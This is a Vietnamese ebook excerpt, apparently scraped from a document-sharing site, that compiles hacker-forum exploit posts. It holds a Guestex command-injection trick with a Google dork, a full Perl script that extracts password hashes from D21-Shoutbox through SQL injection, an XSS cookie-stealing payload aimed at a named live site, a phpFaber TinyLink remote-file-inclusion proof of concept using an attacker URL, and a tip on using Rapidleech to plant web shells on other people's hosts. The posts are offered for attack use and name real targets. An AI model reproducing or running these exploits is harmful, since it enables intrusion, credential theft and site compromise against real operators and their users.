1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 451 docx

6 134 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 171,19 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Guestex Shell Command Execution Vulnerability Hưởng ứng với mọi người 1 chút : Tuy hơi cũ nhưng hiện tại vẫn dùng được Đầu tiên search bản dính lỗi.. Mình dùng allinurl: guestex.cgi trên

Trang 1

Guestex Shell Command Execution Vulnerability

Hưởng ứng với mọi người 1 chút : Tuy hơi cũ nhưng hiện tại vẫn dùng được

Đầu tiên search bản dính lỗi Mình dùng allinurl: guestex.cgi trên google

Lỗi trong file guestex.pl cho phép ta thực hiện shell command

Ở trong guestbook tại phần " your e-mail:" ta điền :

someone@somewhere.com;[command here]

Có thể thử trên site sau :

http://www.mauroux.ch/

-

Tham khảo evuln.com

Pip(VNISS)

D21-Shoutbox version 1.1 exploit

Code:

################################################

#!/usr/bin/perl #

# D21-Shoutbox #

# Author : longnhi #

# Exploit Coded by Windak & langtuhaohoa #

# We are : Www.HceGroup.Net - Www.HceGroup.Biz #

################################################

use HTTP::Cookies;

use LWP 5.64;

use HTTP::Request;

# variables

Trang 2

my $login_page = '?act=Login&CODE=01';

my $id = '';

my $table_fix = '';

my $pose_pm_page = '?';

my $tries = 5;

my $sql = '';

my $i;

my $j;

# objects

my $ua = LWP::UserAgent->new;

my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);

my $resp;

# init the cookie jar

$ua->cookie_jar ($cj);

# allow redirects on post requests

push @{ $ua->requests_redirectable }, "POST";

# get user input

print ' Forum Use D21-Shoutbox URL ? ';

chomp (my $base_url = <STDIN>);

print 'Your username ? ';

chomp (my $user = <STDIN>);

$form{entered_name} = $user;

print 'Your pass ? ';

# systems without stty will error otherwise

my $stty = -x '/bin/stty';

system 'stty -echo' if $stty; # to turn off echoing

chomp (my $pass = <STDIN>);

system 'stty echo' if $stty; # to turn it back on

print "\n" if $stty;

print 'id you want get hashpass? '; # it'll say next to one of their posts chomp (my $id = <STDIN>);

print ' Table prefix ( ex : ibf_ ) ? ';

chomp ( my $table_fix = <STDIN>);

Trang 3

# parse the given base url

if ($base_url !~ m#^http://#) { $base_url = 'http://' $base_url }

if ($base_url !~ m#/$|index\.php$#) { $base_url = '/' }

do {

$resp = $ua->post ($base_url $login_page,

[ UserName => $user, PassWord => $pass, CookieDate => 1, ]);

} while ($tries && !$resp->is_success());

# did we get 200 (OK) ?

if (!$resp->is_success()) { die 'Error: ' $resp->status_line "\n" }

# was the pass right ?

if ($resp->content =~ /sorry, the password was wrong/i) {

die "Error: password incorrect.\n";

}

$| = 1;

print "\nAttempting to extract password hash from database \n ";

$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select member_login_key,1,1 from ".$table_fix."members where id=" $id "/*";

$resp = $ua->get ($base_url $post_pm_page $sql );

if (!$resp->is_success()) {

print "ERROR" ;

}

else {

print "" ;

#print $resp->content;

$rs=$resp->content;

if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "HASH : "; print $1 ;

print "\n \n Bug Hunter By : Longnhi \n";

print "Exploit Coded By : Windak & langtuhaohoa ! We are :

Www.HceGroup.Net ! ";

Trang 4

}

else { print "Can't get the pass from output, try to find it manually : "; print

$resp->content;}

}

print "\x08 \x08\n hehehe ! Good luck to Hack !.\n";

<STDIN>;

langtuhaohoa(HCE)

Nuke Việt Với XSS

- Tìm thấy và mô tả bởi : Navaro(HCE)

- Nhận xét : Nuke Việt là 1 loại portal được phát triển dựa trên mã nguồn của PHP-Nuke, tuy nhiên so với php-nuke thì tính bảo mật của Nuke Việt cao hơn nhiều nhờ

có cơ chế antiddos, anti sql injection, anti remote include file nữa Tuy nhiên thì Nuke Việt lại có bug xss

- File dính bug : viewimg.php biến imglink

- Hôm nay lấy : http://xaluan.com/viewimg.php?imglink=a làm demo để anh em check

- Do không lộc biến nên đã xảy ra tình huống này, xem đoạn code sau :

Trích:

<img name="LargeImg" src="<?php echo $_GET['imglink']?>" border="0"

title="Close">

Giờ thì mọi người thấy đó , ta có thể dựa vào sự "thiếu sót" này để khai thắc lấy thông tin cookie

Hãy thử xem với :

Trích:

http://xaluan.com/viewimg.php?imglink="><script>document.write(docum

ent.cookie);</script><"

Trang 5

Lưu ý : Cookie ta lấy được chứa những thông tin rất quan trọng như : id, name, password(tức nhiên đã mã hóa md5)

phpFaber TinyLink 1.x RFI vul

#########################################

#Product name: phpFaber TinyLink

#Affected version: 1.x

#Type: Remote file inclusion

#Discovered by: black_hat_cr @ VnForce Team

#Vendor: phpfaber.com

#Dork: "Powered By phpFaber TinyLink"

#Status: not reported

#Date: Dec 10 2006

#########################################

Affected file: /tiny_includes/config.php

vul code:

PHP Code:

require_once("$dir_ws/tiny_includes/i_INI.php");

proof of concept:

<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?

have fun !

(c) HcEgRoUp.NeT !

Rapid Leecher

Lâu ngày ko có trò gì vui, ngồi mò mò cái này cho mọi người tham khảo

Mọi người chắc biết thằng rapidleech này chứ, cái này dùng để transfer file từ Rapid, mega, về host của mình

Thực ra cái này ko phải là bug gì chỉ tại thằng này cho tranfer tất cả các loại file

mà ko check file type nên mình có thể lợi dụng cái này để tranfer file shell php hay

Trang 6

asp từ rapidshare về host tụi nó

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN